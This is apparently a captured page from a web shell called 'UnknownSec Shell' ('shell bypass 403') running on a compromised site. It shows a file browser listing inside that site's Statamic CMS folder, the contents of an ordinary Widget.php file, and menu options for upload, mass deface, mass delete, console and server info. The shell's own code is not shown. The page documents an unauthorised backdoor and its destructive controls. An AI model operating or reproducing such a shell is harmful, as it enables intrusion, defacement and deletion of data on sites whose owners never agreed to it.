shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Forms
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Widget.php
<?php namespace Statamic\Forms; use Statamic\Facades\Form; use Statamic\Facades\User; use Statamic\Widgets\Widget as BaseWidget; class Widget extends BaseWidget { protected static $handle = 'form'; public function html() { $form = Form::find($handle = $this->config('form')); if (! $form) { return "Error: Form [$handle] doesn't exist."; } if (! User::current()->can('view', $form)) { return; } return view('statamic::forms.widget', [ 'form' => $form, 'format' => $this->config('date_format', $form->dateFormat()), 'fields' => $this->config('fields', []), 'submissions' => collect($form->submissions())->reverse()->take((int) $this->config('limit', 5))->toArray(), 'title' => $this->config('title', $form->title()), ]); } }
© 2026 UnknownSec